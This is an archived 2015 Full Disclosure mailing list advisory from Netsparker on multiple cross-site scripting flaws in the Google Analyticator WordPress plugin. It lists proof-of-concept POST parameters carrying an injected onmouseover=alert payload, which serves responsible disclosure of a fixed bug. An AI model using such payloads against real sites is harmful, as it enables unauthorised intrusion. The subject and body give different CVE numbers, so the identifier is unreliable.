[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAMDUZo6Ow2H7LztRqkKjdm8yeAvvikC5uCmsBKQ_iyVNkxMkcg@mail.gmail.com>
Date: Mon, 24 Aug 2015 14:45:36 +0300
From: Onur Yilmaz <onur@...sparker.com>
To: fulldisclosure@...lists.org, cert@...t.org, vuln@...unia.com,
bugs@...uritytracker.com, submissions@...ketstormsecurity.org,
bugtraq@...urityfocus.com
Subject: [FD] Google Analyticator Security Advisory - Multiple XSS
Vulnerabilities - CVE-2015-6328
Information
--------------------
Advisory by Netsparker.
Name: Multiple XSS Vulnerabilities in Google Analyticator
Affected Software : Google Analyticator (WordPress Plugin)
Affected Versions: 6.4.9.4 and possibly below
Vendor Homepage : https://wordpress.org/plugins/google-analyticator/
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Fixed
CVE-ID : CVE-2015-6238
Netsparker Advisory Reference : NS-15-013
Description
--------------------
By exploiting a Cross-site scripting vulnerability the attacker can hijack
a logged in user’s session. This means that the malicious hacker can change
the logged in user’s password and invalidate the session of the victim
while the hacker maintains access. As seen from the XSS example in this
article, if a web application is vulnerable to cross-site scripting and the
administrator’s session is hijacked, the malicious hacker exploiting the
vulnerability will have full admin privileges on that web application.
Technical Details
--------------------
Proof of Concept URLs for XSS in Google Analyticator 6.4.9.4:
Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_adsense
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)
Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_admin_disable_DimentionIndex
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)
Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_downloads_prefix
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)
Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_downloads
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)
Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_outbound_prefix
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)
For more information on cross-site scripting vulnerabilities read the
following article:
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/
Advisory Timeline
--------------------
14/08/2015 - First Contact
24/08/2015 - Vendor Fixed
24/08/2015 - Advisory Released
Solution
--------------------
https://downloads.wordpress.org/plugin/google-analyticator.6.4.9.6.zip
Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing Netsparker Web
Application Security Scanner.
About Netsparker
--------------------
Netsparker finds and reports security issues and vulnerabilities such as
SQL Injection and Cross-site Scripting (XSS) in all websites and web
applications regardless of the platform and the technology they are built
on. Netsparker's unique detection and exploitation techniques allows it to
be dead accurate in reporting hence it's the first and the only False
Positive Free web application security scanner. For more information visit
our website on https://www.netsparker.com
--
Onur Yılmaz - National General Manager
Netsparker Web Application Security Scanner <https://www.netsparker.com>
T: +90 (0)554 873 0482
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists